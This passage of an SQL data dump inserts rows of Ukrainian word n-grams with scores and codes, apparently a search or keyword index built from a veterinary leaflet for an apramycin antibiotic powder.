вiком',0,1,1.6,'д000',1,'*'),(1556303,'дозволяють','дозволяють',0,0,0.6667,'д000',1,'*'),(1556304,'дозволяють безобмежень','дозволяють безобмежень',0,1,1.7333,'д000',1,'*'),(1556305,'дозволяють безобмежень отримане','дозволяють безобмежень отримане',0,1,2,'д000',1,'*'),(1556306,'дозволяють через','дозволяють через',0,1,1.5333,'д000',1,'*'),(1556307,'дозволяють через 28','дозволяють через 28',0,1,1.6333,'д000',1,'*'),(1556308,'дозування перорально 3','дозування перорально 3',0,1,1.7333,'д000',1,'*'),(1556309,'допоміжнi','допоміжнi',0,0,0.6,'д000',1,'*'),(1556310,'допоміжнi речовини','допоміжнi речовини',0,1,1.6,'д000',1,'*'),(1556311,'допоміжнi речовини кремнезем','допоміжнi речовини кремнезем',0,1,1.9333,'д000',1,'*'),(1556312,'ентерити','ентерити',0,0,0.5333,'е000',1,'*'),(1556313,'ентерити що','ентерити що',0,1,1.3667,'е000',1,'*'),(1556314,'ентерити що спричинен1','ентерити що спричинен1',0,1,1.7333,'е000',1,'*'),(1556315,'ефекту','ефекту',0,0,0.4,'е000',1,'*'),(1556316,'ефекту не','ефекту не',0,1,1.3,'е000',1,'*'),(1556317,'ефекту не змішувати','ефекту не змішувати',0,1,1.6333,'е000',1,'*'),(1556318,'з іншими','з іншими',0,1,1.2667,'з000',2,'*'),(1556319,'з іншими лікарськими','з іншими лікарськими',0,1,1.6667,'з000',1,'*'),(1556320,'з організму','з організму',0,1,1.3667,'з000',1,'*'),(1556321,'з організму головним','з організму головним',0,1,1.6667,'з000',1,'*'),(1556322,'з сечею','з сечею',0,1,1.2333,'з000',1,'*'),(1556323,'з сечею застосування','з сечею застосування',0,1,1.6667,'з000',1,'*'),(1556324,'з фекаліями','з фекаліями',0,1,1.3667,'з000',1,'*'),(1556325,'з фекаліями і','з фекаліями і',0,1,1.4333,'з000',1,'*'),(1556326,'зі','зі',0,0,0.1333,'з000',3,'*'),(1556327,'зі зниженням','зі зниженням',0,1,1.4,'з000',1,'*'),(1556328,'зі зниженням антибактеріального','зі зниженням антибактеріального',0,1,2,'з000',1,'*'),(1556329,'за умови','за умови',0,1,1.2667,'з000',1,'*'),(1556330,'за умови зберігання','за умови зберігання',0,1,1.6333,'з000',1,'*'),(1556331,'забій','забій',0,0,0.3333,'з000',1,'*'),(1556332,'забій тварин','забій тварин',0,1,1.4,'з000',1,'*'),(1556333,'забій тварин на','забій тварин на',0,1,1.5,'з000',1,'*'),(1556334,'зазначеного','зазначеного',0,0,0.7333,'з000',1,'*'),(1556335,'зазначеного терміну','зазначеного терміну',0,1,1.6333,'з000',1,'*'),(1556336,'зазначеного терміну м\'ясо','зазначеного терміну м',0,1,1.8333,'з000',1,'*'),(1556337,'залежно','залежно',0,0,0.4667,'з000',1,'*'),(1556338,'залежно від','залежно від',0,1,1.3667,'з000',1,'*'),(1556339,'залежно від висновку','залежно від висновку',0,1,1.6667,'з000',1,'*'),(1556340,'зам1нниками','зам1нниками',0,0,0.7333,'з000',1,'*'),(1556341,'зам1нниками молока','зам1нниками молока',0,1,1.6,'з000',1,'*'),(1556342,'зам1нниками молока у','зам1нниками молока у',0,1,1.6667,'з000',1,'*'),(1556343,'засобами','засобами',0,0,0.5333,'з000',1,'*'),(1556344,'засобами не','засобами не',0,1,1.3667,'з000',1,'*'),(1556345,'засобами не застосовувати','засобами не застосовувати',0,1,1.8333,'з000',1,'*'),(1556346,'застереження забій','застереження забій',0,1,1.6,'з000',1,'*'),(1556347,'застереження забій тварин','застереження забій тварин',0,1,1.8333,'з000',1,'*'),(1556348,'застосовувати котам','застосовувати котам',0,1,1.6333,'з000',1,'*'),(1556349,'застосовувати котам не','застосовувати котам не',0,1,1.7333,'з000',1,'*'),(1556350,'застосовувати курям-несучкам','застосовувати курям-несучкам',0,1,1.9333,'з000',1,'*'),(1556351,'застосовувати курям-несучкам яйця','застосовувати курям-несучкам яйця',0,1,2,'з000',1,'*'),(1556352,'застосовувати одночасно','застосовувати одночасно',0,1,1.7667,'з000',1,'*'),(1556353,'застосовувати одночасно 3','застосовувати одночасно 3',0,1,1.8333,'з000',1,'*'),(1556354,'застосовувати тваринам','застосовувати тваринам',0,1,1.7333,'з000',1,'*'),(1556355,'застосовувати тваринам у','застосовувати тваринам у',0,1,1.8,'з000',1,'*'),(1556356,'застосування qj01gb90','застосування qj01gb90',0,1,1.7,'з210',1,'*'),(1556357,'застосування qj01gb90 апраміцин','застосування qj01gb90 апраміцин',0,1,2,'з210',1,'*'),(1556358,'застосування листівка-вкладка','застосування листівка-вкладка',0,1,1.9667,'з000',1,'*'),(1556359,'застосування листівка-вкладка опис','застосування листівка-вкладка опис',0,1,2,'з000',1,'*'),(1556360,'застосування препарату','застосування препарату',0,1,1.7333,'з000',1,'*'),(1556361,'застосування препарату споживання','застосування препарату споживання',0,1,2,'з000',1,'*'),(1556362,'застосування телята','застосування телята',0,1,1.6333,'з000',1,'*'),(1556363,'застосування телята вiком','застосування телята вiком',0,1,1.8333,'з000',1,'*'),(1556364,'застосуванням','застосуванням',0,0,0.8667,'з000',2,'*'),(1556365,'застосуванням систему','застосуванням систему',0,1,1.7,'з000',1,'*'),(1556366,'застосуванням систему поїння','застосуванням систему поїння',0,1,1.9333,'з000',1,'*'),(1556367,'захворюваннях травного','захворюваннях травного',0,1,1.7333,'з000',1,'*'),(1556368,'захворюваннях травного каналу','захворюваннях травного каналу',0,1,1.9667,'з000',1,'*'),(1556369,'захисним','захисним',0,0,0.5333,'з000',1,'*'),(1556370,'захисним кільцем','захисним кільцем',0,1,1.5333,'з000',1,'*'),(1556371,'захисним кільцем пакувальний','захисним кільцем пакувальний',0,1,1.9333,'з000',1,'*'),(1556372,'зберігання його','зберігання його',0,1,1.5,'з000',1,'*'),(1556373,'зберігання його у','зберігання його у',0,1,1.5667,'з000',1,'*'),(1556374,'зв\'язку','зв',0,0,0.4667,'з000',2,'*'),(1556375,'зв\'язку зі','зв зі',0,1,1.3333,'з000',1,'*'),(1556376,'зв\'язку зі зниженням','зв зі зниженням',0,1,1.6667,'з000',1,'*'),(1556377,'згодовують','згодовують',0,0,0.6667,'з000',1,'*'),(1556378,'згодовують непродуктивним','згодовують непродуктивним',0,1,1.8333,'з000',1,'*'),(1556379,'згодовують непродуктивним тваринам','згодовують непродуктивним тваринам',0,1,2,'з000',1,'*'),(1556380,'змішувати','змішувати',0,0,0.6,'з000',1,'*'),(1556381,'змішувати з','змішувати з',0,1,1.3667,'з000',1,'*'),(1556382,'змішувати з іншими','змішувати з іншими',0,1,1.6,'з000',1,'*'),(1556383,'зниженням','зниженням',0,0,0.6,'з000',1,'*'),(1556384,'зниженням антибактеріального','зниженням антибактеріального',0,1,1.9333,'з000',1,'*'),(1556385,'зниженням антибактеріального ефекту','зниженням антибактеріального ефекту',0,1,2,'з000',1,'*'),(1556386,'и надежность','и надежность',0,1,1.4,'и000',1,'*'),(1556387,'и надежность апраміцин','и надежность апраміцин',0,1,1.7333,'и000',1,'*'),(1556388,'из антибиотиков','из антибиотиков',0,1,1.5,'и000',1,'*'),(1556389,'из антибиотиков группы','из антибиотиков группы',0,1,1.7333,'и000',1,'*'),(1556390,'його у','його у',0,1,1.2,'й000',1,'*'),(1556391,'його у темному','його у темному',0,1,1.4667,'й000',1,'*'),(1556392,'кільцем','кільцем',0,0,0.4667,'к000',1,'*'),(1556393,'кільцем пакувальний','кільцем пакувальний',0,1,1.6333,'к000',1,'*'),(1556394,'кільцем пакувальний матеріал','кільцем пакувальний матеріал',0,1,1.9333,'к000',1,'*'),(1556395,'каналу','каналу',0,0,0.4,'к000',1,'*'),(1556396,'каналу що','каналу що',0,1,1.3,'к000',1,'*'),(1556397,'каналу що спричинен1','каналу що спричинен1',0,1,1.6667,'к000',1,'*'),(1556398,'канам','канам',0,0,0.3333,'к000',1,'*'),(1556399,'канам препарат','канам препарат',0,1,1.4667,'к000',1,'*'),(1556400,'канам препарат не','канам препарат не',0,1,1.5667,'к000',1,'*'),(1556401,'кг корму','кг корму',0,1,1.2667,'к000',1,'*'),(1556402,'кг корму що','кг корму що',0,1,1.3667,'к000',1,'*'),(1556403,'кг корму щодобово','кг корму щодобово',0,1,1.5667,'к000',1,'*'),(1556404,'кг маси','кг маси',0,1,1.2333,'к000',1,'*'),(1556405,'кг маси тiла','кг маси тiла',0,1,1.4,'к000',1,'*'),(1556406,'кг маси тіла','кг маси тіла',0,1,1.4,'к000',1,'*'),(1556407,'клітини','клітини',0,0,0.4667,'к000',1,'*'),(1556408,'клітини активно','клітини активно',0,1,1.5,'к000',1,'*'),(1556409,'клітини активно діє','клітини активно діє',0,1,1.6333,'к000',1,'*'),(1556410,'класифікаційний','класифікаційний',0,0,1,'к000',1,'*'),(1556411,'класифікаційний код','класифікаційний код',0,1,1.6333,'к000',1,'*'),(1556412,'класифікаційний код qj01','класифікаційний код qj01',0,1,1.8,'к200',1,'*'),(1556413,'код','код',0,0,0.2,'к000',1,'*'),(1556414,'код qj01','код qj01',0,1,1.2667,'к200',1,'*'),(1556415,'код qj01 антибактеріальні','код qj01 антибактеріальні',0,1,1.8333,'к200',1,'*'),(1556416,'колiбактер1оз','колiбактер1оз',0,0,0.8667,'к000',1,'*'),(1556417,'колiбактер1оз 1','колiбактер1оз 1',0,1,1.5,'к000',1,'*'),(1556418,'колiбактер1оз 1 сальмонельоз','колiбактер1оз 1 сальмонельоз',0,1,1.9333,'к000',1,'*'),(1556419,'колiбактер1оз що','колiбактер1оз що',0,1,1.5333,'к000',1,'*'),(1556420,'колiбактер1оз що спричинений','колiбактер1оз що спричинений',0,1,1.9333,'к000',1,'*'),(1556421,'колоїдний','колоїдний',0,0,0.6,'к000',1,'*'),(1556422,'колоїдний безводний','колоїдний безводний',0,1,1.6333,'к000',1,'*'),(1556423,'колоїдний безводний лактози','колоїдний безводний лактози',0,1,1.9,'к000',1,'*'),(1556424,'кольору склад','кольору склад',0,1,1.4333,'к000',1,'*'),(1556425,'кольору склад 1','кольору склад 1',0,1,1.5,'к000',1,'*'),(1556426,'концентрац11','концентрац11',0,0,0.8,'к000',1,'*'),(1556427,'концентрац11 у','концентрац11 у',0,1,1.4667,'к000',1,'*'),(1556428,'концентрац11 у травному','концентрац11 у травному',0,1,1.7667,'к000',1,'*'),(1556429,'корму','корму',0,0,0.3333,'к000',1,'*'),(1556430,'корму що','корму що',0,1,1.2667,'к000',1,'*'),(1556431,'корму що становить','корму що становить',0,1,1.6,'к000',1,'*'),(1556432,'корму щодобово','корму щодобово',0,1,1.4667,'к000',1,'*'),(1556433,'корму щодобово протягом','корму щодобово протягом',0,1,1.7667,'к000',1,'*'),(1556434,'котам','котам',0,0,0.3333,'к000',1,'*'),(1556435,'котам не','котам не',0,1,1.2667,'к000',1,'*'),(1556436,'котам не застосовувати','котам не застосовувати',0,1,1.7333,'к000',1,'*'),(1556437,'кремнезем','кремнезем',0,0,0.6,'к000',1,'*'),(1556438,'кремнезем колоїдний','кремнезем колоїдний',0,1,1.6333,'к000',1,'*'),(1556439,'кремнезем колоїдний безводний','кремнезем колоїдний безводний',0,1,1.9667,'к000',1,'*'),(1556440,'кремового','кремового',0,0,0.6,'к000',1,'*'),(1556441,'кремового кольору','кремового кольору',0,1,1.5667,'к000',1,'*'),(1556442,'кремового кольору склад','кремового кольору склад',0,1,1.7667,'к000',1,'*'),(1556443,'кришками','кришками',0,0,0.5333,'к000',1,'*'),(1556444,'кришками типу','кришками типу',0,1,1.4333,'к000',1,'*'),(1556445,'кришками типу «кришка','кришками типу «кришка',0,1,1.7,'к000',1,'*'),(1556446,'кришці»','кришці»',0,0,0.4667,'к000',1,'*'),(1556447,'кришці» 13','кришці» 13',0,1,1.3333,'к000',1,'*'),(1556448,'кришці» 13 встановленим','кришці» 13 встановленим',0,1,1.7667,'к000',1,'*'),(1556449,'кролi','кролi',0,0,0.3333,'к000',1,'*'),(1556450,'кролi лiкування','кролi лiкування',0,1,1.5,'к000',1,'*'),(1556451,'кролi лiкування тварин','кролi лiкування тварин',0,1,1.7333,'к000',1,'*'),(1556452,'кролі','кролі',0,0,0.3333,'к000',1,'*'),(1556453,'кролі 100-200','кролі 100-200',0,1,1.4333,'к000',1,'*'),(1556454,'кролі 100-200 мг','кролі 100-200 мг',0,1,1.5333,'к000',1,'*'),(1556455,'кролів','кролів',0,0,0.4,'к000',1,'*'),(1556456,'кролів та','кролів та',0,1,1.3,'к000',1,'*'),(1556457,'кролів та курчат','кролів та курчат',0,1,1.5333,'к000',1,'*'),(1556458,'кури-бройлери','кури-бройлери',0,0,0.8667,'к000',1,'*'),(1556459,'кури-бройлери 0,5-1','кури-бройлери 0,5-1',0,1,1.6333,'к000',1,'*'),(1556460,'кури-бройлери 0,5-1 г','кури-бройлери 0,5-1 г',0,1,1.7,'к000',1,'*'),(1556461,'кури-бройлери лiкування','кури-бройлери лiкування',0,1,1.7667,'к000',1,'*'),(1556462,'кури-бройлери лiкування птицi','кури-бройлери лiкування птицi',0,1,1.9667,'к000',1,'*'),(1556463,'курчат дозволяють','курчат дозволяють',0,1,1.5667,'к000',1,'*'),(1556464,'курчат дозволяють безобмежень','курчат дозволяють безобмежень',0,1,1.9667,'к000',1,'*'),(1556465,'курчата','курчата',0,0,0.4667,'к000',1,'*'),(1556466,'курчата кури-бройлери','курчата кури-бройлери',0,1,1.7,'к000',1,'*'),(1556467,'курчата кури-бройлери 0,5-1','курчата кури-бройлери 0,5-1',0,1,1.9,'к000',1,'*'),(1556468,'курчата кури-бройлери лiкування','курчата кури-бройлери лiкування',0,1,2,'к000',1,'*'),(1556469,'курям-несучкам','курям-несучкам',0,0,0.9333,'к000',1,'*'),(1556470,'курям-несучкам яйця','курям-несучкам яйця',0,1,1.6333,'к000',1,'*'),(1556471,'курям-несучкам яйця яких','курям-несучкам яйця яких',0,1,1.8,'к000',1,'*'),(1556472,'л питноi\'','л питноi',0,1,1.3,'л000',1,'*'),(1556473,'л питноi\' води','л питноi води',0,1,1.4667,'л000',1,'*'),(1556474,'лiкування','лiкування',0,0,0.6,'л000',1,'*'),(1556475,'лiкування птицi','лiкування птицi',0,1,1.5,'л000',1,'*'),(1556476,'лiкування птицi хворо\'i','лiкування птицi хворо',0,1,1.7667,'л000',1,'*'),(1556477,'лiкування тварин','лiкування тварин',0,1,1.5333,'л000',1,'*'),(1556478,'лiкування тварин при','лiкування тварин при',0,1,1.6667,'л000',1,'*'),(1556479,'лiкування тварин хворих','лiкування тварин хворих',0,1,1.7667,'л000',1,'*'),(1556480,'лікарськими','лікарськими',0,0,0.7333,'л000',1,'*'),(1556481,'лікарськими засобами','лікарськими засобами',0,1,1.6667,'л000',1,'*'),(1556482,'лікарськими засобами не','лікарськими засобами не',0,1,1.7667,'л000',1,'*'),(1556483,'лактації','лактації',0,0,0.5333,'л000',1,'*'),(1556484,'лактації застереження','лактації застереження',0,1,1.7,'л000',1,'*'),(1556485,'лактації застереження забій','лактації застереження забій',0,1,1.9,'л000',1,'*'),(1556486,'лактози','лактози',0,0,0.4667,'л000',1,'*'),(1556487,'лактози моногідрат','лактози моногідрат',0,1,1.6,'л000',1,'*'),(1556488,'лактози моногідрат фармакологічні','лактози моногідрат фармакологічні',0,1,2,'л000',1,'*'),(1556489,'листівка-вкладка','листівка-вкладка',0,0,1,'л000',1,'*'),(1556490,'листівка-вкладка опис','листівка-вкладка опис',0,1,1.7,'л000',1,'*'),(1556491,'листівка-вкладка опис порошок','листівка-вкладка опис порошок',0,1,1.9667,'л000',1,'*'),(1556492,'людьми','людьми',0,0,0.4,'л000',2,'*'),(1556493,'людьми препарат','людьми препарат',0,1,1.5,'л000',1,'*'),(1556494,'людьми препарат не','людьми препарат не',0,1,1.6,'л000',1,'*'),(1556495,'м\'яса','м',0,0,0.3333,'м000',1,'*'),(1556496,'м\'яса поросят','м поросят',0,1,1.4333,'м000',1,'*'),(1556497,'м\'яса поросят ягнят','м поросят ягнят',0,1,1.6333,'м000',1,'*'),(1556498,'м\'ясо дозволяють','м дозволяють',0,1,1.5333,'м000',1,'*'),(1556499,'м\'ясо дозволяють через','м дозволяють через',0,1,1.7333,'м000',1,'*'),(1556500,'м\'ясо утилізують','м утилізують',0,1,1.5333,'м000',1,'*'),(1556501,'м\'ясо утилізують або','м утилізують або',0,1,1.6667,'м000',1,'*'),(1556502,'м1сяцiв','м1сяцiв',0,0,0.4667,'м000',1,'*'),(1556503,'м1сяцiв 20-40','м1сяцiв 20-40',0,1,1.4333,'м000',1,'*'),(1556504,'м1сяцiв 20-40 мгпрепарату','м1сяцiв 20-40 мгпрепарату',0,1,1.8333,'м000',1,'*'),(1556505,'м1сяцiв лiкування','м1сяцiв лiкування',0,1,1.5667,'м000',1,'*'),(1556506,'м1сяцiв лiкування тварин','м1сяцiв лiкування тварин',0,1,1.8,'м000',1,'*'),(1556507,'мiкроорган1змами','мiкроорган1змами',0,0,1,'м000',1,'*'),(1556508,'мiкроорган1змами чутливими','мiкроорган1змами чутливими',0,1,1.8667,'м000',1,'*'),(1556509,'мiкроорган1змами чутливими до','мiкроорган1змами чутливими до',0,1,1.9667,'м000',1,'*'),(1556510,'мiсяц1в','мiсяц1в',0,0,0.4667,'м000',1,'*'),(1556511,'мiсяц1в 40-80','мiсяц1в 40-80',0,1,1.4333,'м000',1,'*'),(1556512,'мiсяц1в 40-80 мг','мiсяц1в 40-80 мг',0,1,1.5333,'м000',1,'*'),(1556513,'мікоплазми','мікоплазми',0,0,0.6667,'м000',1,'*'),(1556514,'мікоплазми мусоplasma','мікоплазми мусоplasma',0,1,1.7,'м1425',1,'*'),(1556515,'мікоплазми мусоplasma hyopneumoniae','мікоплазми мусоplasma hyopneumoniae',0,1,2,'м142515',1,'*'),(1556516,'мікроорганізми','мікроорганізми',0,0,0.9333,'м000',1,'*'),(1556517,'мікроорганізми staphylococcus','мікроорганізми staphylococcus',0,1,1.9667,'м23142',1,'*'),(1556518,'мікроорганізми staphylococcus aureus','мікроорганізми staphylococcus aureus',0,1,2,'м2314262',1,'*'),(1556519,'місце при','місце при',0,1,1.3,'м000',1,'*'),(1556520,'місце при температурі','місце при температурі',0,1,1.7,'м000',1,'*'),(1556521,'маси','маси',0,0,0.2667,'м000',1,'*'),(1556522,'маси тiла','маси тiла',0,1,1.3,'м000',1,'*'),(1556523,'маси тiла 10-20','маси тiла 10-20',0,1,1.5,'м000',1,'*'),(1556524,'маси тiла 20-40','маси тiла 20-40',0,1,1.5,'м000',1,'*'),(1556525,'маси тiла 250-500','маси тiла 250-500',0,1,1.5667,'м000',1,'*'),(1556526,'маси тiла щодобово','маси тiла щодобово',0,1,1.6,'м000',1,'*'),(1556527,'маси тіла','маси тіла',0,1,1.3,'м000',1,'*'),(1556528,'маси тіла 250-500','маси тіла 250-500',0,1,1.5667,'м000',1,'*'),(1556529,'маси тіла 50-100','маси тіла 50-100',0,1,1.5333,'м000',1,'*'),(1556530,'матеріал','матеріал',0,0,0.5333,'м000',1,'*'),(1556531,'матеріал виготовлений','матеріал виготовлений',0,1,1.7,'м000',1,'*'),(1556532,'матеріал виготовлений 13','матеріал виготовлений 13',0,1,1.8,'м000',1,'*'),(1556533,'мг апрам1цину','мг апрам1цину',0,1,1.4333,'м000',1,'*'),(1556534,'мг апрам1цину на','мг апрам1цину на',0,1,1.5333,'м000',1,'*'),(1556535,'мг апраміцину','мг апраміцину',0,1,1.4333,'м000',1,'*'),(1556536,'мг апраміцину на','мг апраміцину на',0,1,1.5333,'м000',1,'*'),(1556537,'мг д1ючоi\'','мг д1ючоi',0,1,1.3333,'м000',1,'*'),(1556538,'мг д1ючоi\' речовини','мг д1ючоi речовини',0,1,1.6333,'м000',1,'*'),(1556539,'мг діючої','мг діючої',0,1,1.3,'м000',1,'*'),(1556540,'мг діючої речовини','мг діючої речовини',0,1,1.6,'м000',1,'*'),(1556541,'мг допоміжнi','мг допоміжнi',0,1,1.4,'м000',1,'*'),(1556542,'мг допоміжнi речовини','мг допоміжнi речовини',0,1,1.7,'м000',1,'*'),(1556543,'мг препарату','мг препарату',0,1,1.4,'м000',1,'*'),(1556544,'мг препарату на','мг препарату на',0,1,1.5,'м000',1,'*'),(1556545,'мгпрепарату','мгпрепарату',0,0,0.7333,'м000',1,'*'),(1556546,'мгпрепарату на','мгпрепарату на',0,1,1.4667,'м000',1,'*'),(1556547,'мгпрепарату на 1','мгпрепарату на 1',0,1,1.5333,'м000',1,'*'),(1556548,'медицини перед','медицини перед',0,1,1.4667,'м000',1,'*'),(1556549,'медицини перед застосуванням','медицини перед застосуванням',0,1,1.9333,'м000',1,'*'),(1556550,'метаболізується','метаболізується',0,0,1,'м000',1,'*'),(1556551,'метаболізується і','метаболізується і',0,1,1.5667,'м000',1,'*'),(1556552,'метаболізується і характеризуєтьсянизькою','метаболізується і характеризуєтьсянизькою',0,1,2,'м000',1,'*'),(1556553,'молока','молока',0,0,0.4,'м000',1,'*'),(1556554,'молока у','молока у',0,1,1.2667,'м000',1,'*'),(1556555,'молока у дозах','молока у дозах',0,1,1.4667,'м000',1,'*'),(1556556,'моногідрат','моногідрат',0,0,0.6667,'м000',1,'*'),(1556557,'моногідрат фармакологічні','моногідрат фармакологічні',0,1,1.8333,'м000',1,'*'),(1556558,'моногідрат фармакологічні властивості','моногідрат фармакологічні властивості',0,1,2,'м000',1,'*'),(1556559,'мусоplasma','мусоplasma',0,0,0.6667,'м1425',1,'*'),(1556560,'мусоplasma hyopneumoniae','мусоplasma hyopneumoniae',0,1,1.8,'м142515',1,'*'),(1556561,'мусоplasma hyopneumoniae при','мусоplasma hyopneumoniae при',0,1,1.9333,'м142515',1,'*'),(1556562,'на грамнегативні','на грамнегативні',0,1,1.5333,'н000',1,'*'),(1556563,'на грамнегативні bordetella','на грамнегативні bordetella',0,1,1.9,'н1634',1,'*'),(1556564,'на ентерити','на ентерити',0,1,1.3667,'н000',1,'*'),(1556565,'на ентерити що','на ентерити що',0,1,1.4667,'н000',1,'*'),(1556566,'на колiбактер1оз','на колiбактер1оз',0,1,1.5333,'н000',1,'*'),(1556567,'на колiбактер1оз 1','на колiбактер1оз 1',0,1,1.6,'н000',1,'*'),(1556568,'на колiбактер1оз що','на колiбактер1оз що',0,1,1.6333,'н000',1,'*'),(1556569,'на м\'ясо дозволяють','на м дозволяють',0,1,1.6333,'н000',1,'*'),(1556570,'на основу','на основу',0,1,1.3,'н000',1,'*'),(1556571,'на основу 500','на основу 500',0,1,1.4333,'н000',1,'*'),(1556572,'на септицем1ю','на септицем1ю',0,1,1.4333,'н000',1,'*'),(1556573,'на септицем1ю що','на септицем1ю що',0,1,1.5333,'н000',1,'*'),(1556574,'надежность','надежность',0,0,0.6667,'н000',1,'*'),(1556575,'надежность апраміцин','надежность апраміцин',0,1,1.6667,'н000',1,'*'),(1556576,'надежность апраміцин водорозчинний','надежность апраміцин водорозчинний',0,1,2,'н000',1,'*'),(1556577,'не застосовувати котам','не застосовувати котам',0,1,1.7333,'н000',1,'*'),(1556578,'не застосовувати курям-несучкам','не застосовувати курям-несучкам',0,1,2,'н000',1,'*'),(1556579,'не застосовувати одночасно','не застосовувати одночасно',0,1,1.8667,'н000',1,'*'),(1556580,'не застосовувати тваринам','не застосовувати тваринам',0,1,1.8333,'н000',1,'*'),(1556581,'не змішувати','не змішувати',0,1,1.4,'н000',1,'*'),(1556582,'не змішувати з','не змішувати з',0,1,1.4667,'н000',1,'*'),(1556583,'не метаболізується','не метаболізується',0,1,1.6,'н000',1,'*'),(1556584,'не метаболізується і','не метаболізується і',0,1,1.6667,'н000',1,'*'),(1556585,'необхідно використати','необхідно використати',0,1,1.7,'н000',1,'*'),(1556586,'необхідно використати протягом','необхідно використати протягом',0,1,2,'н000',1,'*'),(1556587,'необхідно попередньо','необхідно попередньо',0,1,1.6667,'н000',1,'*'),(1556588,'необхідно попередньо очистити','необхідно попередньо очистити',0,1,1.9667,'н000',1,'*'),(1556589,'непродуктивним','непродуктивним',0,0,0.9333,'н000',1,'*'),(1556590,'непродуктивним тваринам','непродуктивним тваринам',0,1,1.7667,'н000',1,'*'),(1556591,'непродуктивним тваринам залежно','непродуктивним тваринам залежно',0,1,2,'н000',1,'*'),(1556592,'низької','низької',0,0,0.4667,'н000',1,'*'),(1556593,'низької щільності','низької щільності',0,1,1.5667,'н000',1,'*'),(1556594,'низької щільності зберігання','низької щільності зберігання',0,1,1.9333,'н000',1,'*'),(1556595,'одночасно','одночасно',0,0,0.6,'о000',1,'*'),(1556596,'одночасно 3','одночасно 3',0,1,1.3667,'о000',1,'*'),(1556597,'одночасно 3 бета-лактамними','одночасно 3 бета-лактамними',0,1,1.9,'о000',1,'*'),(1556598,'опис порошок білого','опис порошок білого',0,1,1.6333,'о000',1,'*'),(1556599,'організму головним','організму головним',0,1,1.6,'о000',1,'*'),(1556600,'організму головним чином','організму головним чином',0,1,1.8,'о000',1,'*'),(1556601,'основу','основу',0,0,0.4,'о000',1,'*'),(1556602,'основу 500','основу 500',0,1,1.3333,'о000',1,'*'),(1556603,'основу 500 мг','основу 500 мг',0,1,1.4333,'о000',1,'*'),(1556604,'останнього','останнього',0,0,0.6667,'о000',1,'*'),(1556605,'останнього застосування','останнього застосування',0,1,1.7667,'о000',1,'*'),(1556606,'останнього застосування препарату','останнього застосування препарату',0,1,2,'о000',1,'*'),(1556607,'отримане','отримане',0,0,0.5333,'о000',1,'*'),(1556608,'отримане до','отримане до',0,1,1.3667,'о000',1,'*'),(1556609,'отримане до зазначеного','отримане до зазначеного',0,1,1.7667,'о000',1,'*'),(1556610,'очистити','очистити',0,0,0.5333,'о000',1,'*'),(1556611,'очистити від','очистити від',0,1,1.4,'о000',1,'*'),(1556612,'очистити від іржі','очистити від іржі',0,1,1.5667,'о000',1,'*'),(1556613,'підвищена чутливість','підвищена чутливість',0,1,1.6667,'п000',1,'*'),(1556614,'підвищена чутливість до','підвищена чутливість до',0,1,1.7667,'п000',1,'*'),(1556615,'після останнього','після останнього',0,1,1.5333,'п000',1,'*'),(1556616,'після останнього застосування','після останнього застосування',0,1,1.9667,'п000',1,'*'),(1556617,'пакувальний','пакувальний',0,0,0.7333,'п000',1,'*'),(1556618,'пакувальний матеріал','пакувальний матеріал',0,1,1.6667,'п000',1,'*'),(1556619,'пакувальний матеріал виготовлений','пакувальний матеріал виготовлений',0,1,2,'п000',1,'*'),(1556620,'період вагітності','період вагітності',0,1,1.5667,'п000',1,'*'),(1556621,'період вагітності та','період вагітності та',0,1,1.6667,'п000',1,'*'),(1556622,'перед','перед',0,0,0.3333,'п000',3,'*'),(1556623,'перед застосуванням','перед застосуванням',0,1,1.6333,'п000',1,'*'),(1556624,'перед застосуванням систему','перед застосуванням систему',0,1,1.9,'п000',1,'*'),(1556625,'перерахунку','перерахунку',0,0,0.7333,'п000',2,'*'),(1556626,'перерахунку на','перерахунку на',0,1,1.4667,'п000',1,'*'),(1556627,'перерахунку на основу','перерахунку на основу',0,1,1.7,'п000',1,'*'),(1556628,'перорально 3','перорально 3',0,1,1.4,'п000',1,'*'),(1556629,'перорально 3 питною','перорально 3 питною',0,1,1.6333,'п000',1,'*'),(1556630,'перорального','перорального',0,0,0.8,'п000',1,'*'),(1556631,'перорального застосування','перорального застосування',0,1,1.8333,'п000',1,'*'),(1556632,'перорального застосування листівка-вкладка','перорального застосування листівка-вкладка',0,1,2,'п000',1,'*'),(1556633,'пероральному','пероральному',0,0,0.8,'п000',1,'*'),(1556634,'пероральному введенн1','пероральному введенн1',0,1,1.7,'п000',1,'*'),(1556635,'пероральному введенн1 повiльно','пероральному введенн1 повiльно',0,1,2,'п000',1,'*'),(1556636,'питноi\'','питноi',0,0,0.4667,'п000',1,'*'),(1556637,'питноi\' води','питноi води',0,1,1.4,'п000',1,'*'),(1556638,'питноi\' води що','питноi води що',0,1,1.5,'п000',1,'*'),(1556639,'питноi\' води щодобово','питноi води щодобово',0,1,1.7,'п000',1,'*'),(1556640,'питної води що','питної води що',0,1,1.4667,'п000',1,'*'),(1556641,'питної води щодобово','питної води щодобово',0,1,1.6667,'п000',1,'*'),(1556642,'пластикові банки','пластикові банки',0,1,1.5333,'п000',1,'*'),(1556643,'пластикові банки по','пластикові банки по',0,1,1.6333,'п000',1,'*'),(1556644,'пластиковими','пластиковими',0,0,0.8,'п000',1,'*'),(1556645,'пластиковими кришками','пластиковими кришками',0,1,1.7,'п000',1,'*'),(1556646,'пластиковими кришками типу','пластиковими кришками типу',0,1,1.8667,'п000',1,'*'),(1556647,'по 50 г','по 50 г',0,1,1.2333,'п000',1,'*'),(1556648,'поїння','поїння',0,0,0.4,'п000',1,'*'),(1556649,'поїння необхідно','поїння необхідно',0,1,1.5333,'п000',1,'*'),(1556650,'поїння необхідно попередньо','поїння необхідно попередньо',0,1,1.9,'п000',1,'*'),(1556651,'повiльно','повiльно',0,0,0.5333,'п000',1,'*'),(1556652,'повiльно всмокту','повiльно всмокту',0,1,1.5333,'п000',1,'*'),(1556653,'повiльно всмокту ться','повiльно всмокту ться',0,1,1.7,'п000',1,'*'),(1556654,'поліетилену','поліетилену',0,0,0.7333,'п000',1,'*'),(1556655,'поліетилену низької','поліетилену низької',0,1,1.6333,'п000',1,'*'),(1556656,'поліетилену низької щільності','поліетилену низької щільності',0,1,1.9667,'п000',1,'*'),(1556657,'полягає у гальмуванні','полягає у гальмуванні',0,1,1.7,'п000',1,'*'),(1556658,'попередньо','попередньо',0,0,0.6667,'п000',1,'*'),(1556659,'попередньо очистити','попередньо очистити',0,1,1.6333,'п000',1,'*'),(1556660,'попередньо очистити від','попередньо очистити від',0,1,1.7667,'п000',1,'*'),(1556661,'поросят','поросят',0,0,0.4667,'п000',1,'*'),(1556662,'поросят ягнят','поросят 